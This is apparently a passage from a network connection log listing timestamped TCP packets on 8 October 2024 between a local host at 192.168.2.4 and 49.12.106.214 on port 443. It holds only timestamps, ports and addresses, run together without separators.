                                                                                                                Oct 8, 2024 04:59:47.270693064 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.270731926 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.270759106 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.270773888 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.270797014 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.270821095 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.270853043 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.270899057 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.270924091 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.270929098 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.270963907 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.270987988 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.271346092 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.271403074 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.271409988 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.271431923 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.271472931 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.271498919 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.273164988 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.273204088 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.273233891 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.273238897 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.273294926 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.276164055 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.276204109 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.276238918 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.276243925 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.276281118 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.276305914 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.277168989 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.277215004 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.277245998 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.277251005 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.277295113 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.278183937 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.278225899 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.278255939 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.278260946 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.278286934 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.278311014 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.280011892 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.280055046 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.280086040 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.280091047 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.280131102 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.281162024 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.281205893 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.281235933 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.281240940 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.281270027 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.281290054 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.282190084 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.282227993 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.282257080 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.282262087 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.282303095 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.283188105 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.283231020 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.283261061 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.283266068 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.283293962 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.283315897 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.285167933 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.285207987 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.285238981 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.285243988 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.285285950 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.285455942 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.285495043 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.285518885 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.285525084 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.285543919 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.285573959 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.286353111 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.286432028 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.286463976 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.286468983 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.286511898 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.286525965 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.286570072 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.286593914 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.286600113 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.286623955 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.286659956 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.287400007 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.287441969 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.287472010 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.287477016 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.287530899 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.287616014 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.287653923 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.287679911 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.287684917 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.287705898 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.287731886 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.292795897 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.292838097 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.292877913 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.292885065 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.292927027 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.292949915 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.293082952 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.293122053 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.293144941 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.293149948 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.293178082 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.293205976 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.339924097 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.339981079 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.340132952 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.340145111 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.340164900 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.340195894 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.340215921 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.340266943 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.340279102 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.340322018 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.358083010 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358138084 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358175993 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.358182907 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358206034 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.358233929 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.358345032 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358386040 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358514071 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358566046 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358599901 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.358607054 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358664989 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358676910 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.358695030 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358724117 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.358736038 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358764887 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.358769894 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.358834982 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.380079985 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.380105019 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.380415916 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.380433083 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.380564928 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.380580902 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.380686998 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.380693913 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.380738974 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.426654100 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.426708937 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.426794052 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.426884890 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.426970005 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.426991940 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.427025080 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.427063942 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.444674015 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.444751024 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.444873095 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.444920063 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445041895 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445067883 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445113897 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445149899 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445163965 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445194960 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445214987 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445216894 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445238113 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445271015 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445281029 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445312023 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445322990 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.445367098 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.445389032 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467303038 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467360973 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467420101 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467443943 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467494965 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467499018 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467518091 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467535019 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467565060 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467566967 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467597008 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467607975 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.467638969 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.467677116 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.513505936 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.513572931 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.513669968 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.513873100 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.513899088 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.513973951 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.531657934 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.531721115 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.531785965 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.531804085 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.531851053 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.531876087 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.531879902 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.531908989 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.531946898 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.531958103 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.531984091 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.531989098 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532018900 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532054901 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532090902 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532128096 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532157898 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532162905 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532218933 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532227993 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532248020 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532253027 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532274008 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532300949 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532305956 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.532352924 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.532375097 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.553868055 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.553922892 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.554023027 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.554071903 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.554116011 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.554126978 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.554167986 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.554219007 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.599837065 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.599863052 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.599895954 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.599939108 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.599952936 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.599962950 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.600012064 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.600049019 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.626727104 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.626785994 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.626815081 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.626821041 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.626852036 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.626882076 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.626905918 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.626956940 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.626981020 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.626986980 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627031088 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.627074957 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627114058 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627145052 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.627151012 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627170086 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.627199888 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.627224922 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627269983 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627298117 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.627302885 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.627334118 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.627356052 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.640449047 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.640489101 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.640522957 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.640531063 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.640592098 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.640770912 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.640818119 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.640847921 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.640852928 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.640887976 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.640907049 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.686722040 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.686779022 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.686817884 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.686830997 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.686862946 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.686875105 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.686883926 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.686904907 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.686930895 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.686954975 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.686970949 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.687024117 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.687052011 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.687094927 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.687120914 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.687181950 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.687187910 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.687232971 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.687272072 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.687325954 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.687470913 CEST49748443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.687486887 CEST4434974849.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.708528996 CEST49749443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.708636045 CEST4434974949.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:47.708736897 CEST49749443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.709024906 CEST49749443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:47.709048033 CEST4434974949.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:48.358505964 CEST4434974949.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:48.358591080 CEST49749443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:48.359029055 CEST49749443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:48.359050035 CEST4434974949.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:48.361296892 CEST49749443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:48.361309052 CEST4434974949.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:48.361455917 CEST49749443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:48.361473083 CEST4434974949.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:48.790530920 CEST49750443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:48.790560007 CEST4434975049.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:48.790636063 CEST49750443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:48.790896893 CEST49750443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:48.790915012 CEST4434975049.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:49.127036095 CEST4434974949.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:49.127161980 CEST49749443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:49.127188921 CEST4434974949.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:49.127214909 CEST4434974949.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:49.127242088 CEST49749443192.168.2.449.12.106.214
